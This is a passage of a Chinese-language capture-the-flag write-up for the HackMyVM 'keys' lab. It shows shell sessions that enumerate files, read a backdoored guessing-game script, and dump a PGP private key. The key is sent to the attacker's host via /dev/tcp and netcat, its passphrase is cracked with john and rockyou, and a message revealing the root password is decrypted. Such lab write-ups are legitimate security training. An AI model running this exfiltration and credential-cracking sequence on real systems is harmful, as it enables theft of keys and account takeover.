steve@keys:~$ find / -group steve 2>/dev/null | grep -v proc
/opt/number_guessing_game.py
........
/var/mail/private_key.gpg
........
/etc/ssh/ssh_config.d/.steve_id_rsa.pub
/home/steve
/home/steve/.bash_logout
/home/steve/.bashrc
/home/steve/.profile
/home/steve/.ssh
/home/steve/.ssh/just_keys
/home/steve/u__s__e__r.txt
/home/steve/.important_message.asc挨个看一下:
steve@keys:~$ cat /opt/number_guessing_game.py
#!/usr/bin/python3
import random
import os
rand = random.randint(1000, 9999)
secret_number = None
print("\nWelcome to the guessing game :)\n\nNote:- You can guess Secret Number between 1000-9999\nor You can Give me those 4 digits Secret Number to read Steve's id_rsa.pub Key\n")
while secret_number != rand:
secret_number = input("Enter Secret Number: ")
try:
secret_number = int(secret_number)
except ValueError:
print("only integer allowed")
continue
if len(str(secret_number)) == 4:
secret_number = int(secret_number)
else:
print("only 4 digits are allowed")
if secret_number == rand or secret_number == 4695:
id_rsa = os.popen("cat /etc/ssh/ssh_config.d/.steve_id_rsa.pub | rev").read()
print(f"\n{id_rsa}")
break
steve@keys:~$ cat /var/mail/private_key.gpg
-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: BCPG C# v1.6.1.0
lQOsBGF6hOgBCACasV92gCKq4oK/LBX1n7xF6aR9Lf642MCjVE9vnP8q2YilmKpd
Uo27a2nDzX3ycLXmJmSX8rmwpPaX9GALSpBtRoJsR0CHnQUFZC9ZDkOKa7yUwZLS
/rTyTtgBjQbdvZh3c4w0sQpkQlOjtULjC8Pt7N7JwbYUgIFa5z1kBko8L7XZTIKX
VNNFjbBPU9UUiTmTHUUT/ORvtNQqpk7InUlZFGXw9Mu84oDtBwdcYIK1ZrbLkMRS
cDvm/MhQqEiyeLoPgpDztuOi81E++up11INqe56lpE+Xj9AHuJKBaM7Ezl0S2mGa
VNibtKcwBv9h+bypvwBVyuo/B/CDwDsJG8jFABEBAAH/AwMCv3bZNgDf2/RghH1o
wytUtoOwfmXGzM1MFFizg0I9n8PaeT41Z1SY0HX0z92spJYP1WC0JA7wQWWzgz0S
B+7G4cigyQkUXf9Z9TkXF0gae7BsUGBr6A5jukn0Le9VYBqBbwsgQ5SddW0FgtgY
pkENDXHV0cV+yZShUbFa7UPMHXJ43XasvYtCgbx1gAKYgswxuwZF9xBXRVfNcvRS
ul9Q/kBbABn9JxkenvRDdMrSkj5rlgF6PZ3tz9saiwbkLEsxKkX2yUswcj5uZhcn
umPpebHXGW1cUoy5H+oeyzcvpXkBfpMr4/iLKaatly2/0CoKm6ECZ1pZfxILl2g1
1MaKNztjC5G8880UrvdEDSyX7x88ZLKD6RRykh6KAIDCi9S3jfgbf8Tjfa0fihEF
NZjDrbu4KQJmDphCpGUXR5xGr86N7qFoEE/NLLq9R46QS+DhvleVxzELUc3ywUzM
AwN/BXAPsUMTrLwvB+rABLRo1y6vXrM/YqdSuI4f9L/8+PikyYFjy7ad/r0EgSje
jkzS9b3hDfAMsmnIb1cztpUiyV1ZDKYXTOYkroZXyEwowW25fVEPguROv/El1X7D
37wza1yDWiW+jdbCN0CpApyJQcNME+CIS/vW/+LMqr8OHbSdCeHm2s1aVcR0qGFr
iiAIm5z3FIlDOCfs5n6o3ISd7JFSTyHAqihdp8WhY7fg2ugY6GrTQoKpGW8/Hjhg
65oQDIDKGim8p2d39/S6xBiqmerU3vGhA4OoqtR4KsWkdDrX1gaRhpP/j7VK37E5
3tdxQRbiUVckJm73hAuiyLzT+8feDqriQH5ZeDPHXPIeIobY6snPkiaHJSCMhhoY
zX8KReGKBHFDHlVwuoRAQq0zK5ZsdT1HY6QFoJdF6bQNcm9vdEBrZXlzLmNvbYkB
HAQQAQIABgUCYXqE6AAKCRCgdYMaV0tXLSTgB/44M8m3aMcQHlq3Mti13Vje2Ykm
RbST0cE/H8pBbWHoTXOIxiq1740ljh8gIE0/MCxP59m9CXqEJJwG96wo1YtUnENJ
gKCmgRp9fYGAxvREgU3u/9PouJmkG8d72dKV6eXaKCaqLuOezz5WvbCvC5BXyyVA
DArFV2KKC7WosG+o8L8viElXb3rTIws/6gFYxFGUujatvt049SoCMCwX8rDIkHDe
JAXMIgQUZZzjO+1Cwn47ipI91s53A3VCNfCnmXQQ6ILt18gU7vV49+MZ8zQb2LKT
NdxrmDHubOsJI0ws3iKeUmKEK7W5w/jZ7KsecKWHybbOzTZ+LFuLezcbHXtm
=l+1O
-----END PGP PRIVATE KEY BLOCK-----破解gpg
发现破解这个密钥有搞头,传过来试试:
steve@keys:~$ cat /var/mail/private_key.gpg > /dev/tcp/192.168.8.18/1234
┌──(kali💀kali)-[~/temp/key]
└─$ nc -lvnp 1234 > private_key.gpg
listening on [any] 1234 ...
connect to [192.168.8.18] from (UNKNOWN) [192.168.8.19] 58976
┌──(kali💀kali)-[~/temp/key]
└─$ gpg2john private_key.gpg > hash
File private_key.gpg
┌──(kali💀kali)-[~/temp/key]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 3 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
youdidit (root@keys.com)
1g 0:00:02:00 DONE (2024-07-24 17:42) 0.008286g/s 21327p/s 21327c/s 21327C/s youdidit123..youdidit
Use the "--show" option to display all of the cracked passwords reliably
Session completed.可以进行导入密钥了:
steve@keys:~$ gpg --import /var/mail/private_key.gpg
gpg: directory '/home/steve/.gnupg' created
gpg: keybox '/home/steve/.gnupg/pubring.kbx' created
gpg: /home/steve/.gnupg/trustdb.gpg: trustdb created
gpg: key A075831A574B572D: public key "root@keys.com" imported
gpg: key A075831A574B572D: secret key imported
gpg: Total number processed: 1
gpg: imported: 1
gpg: secret keys read: 1
gpg: secret keys imported: 1
steve@keys:~$ gpg --decrypt ./.important_message.asc
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 2048-bit RSA key, ID A075831A574B572D, created 2021-10-28
"root@keys.com"
Root Password is th3_h!dd3n_m3ss4g3gpg: WARNING: message was not integrity protected
gpg: Hint: If this message was created before the year 2003 it is
likely that this message is legitimate. This is because back
then integrity protection was not widely used.
gpg: Use the option '--ignore-mdc-error' to decrypt anyway.
gpg: decryption forced to fail!拿下root!
参考
https://28right.blogspot.com/2021/11/hackmyvm-keys-writeup.html
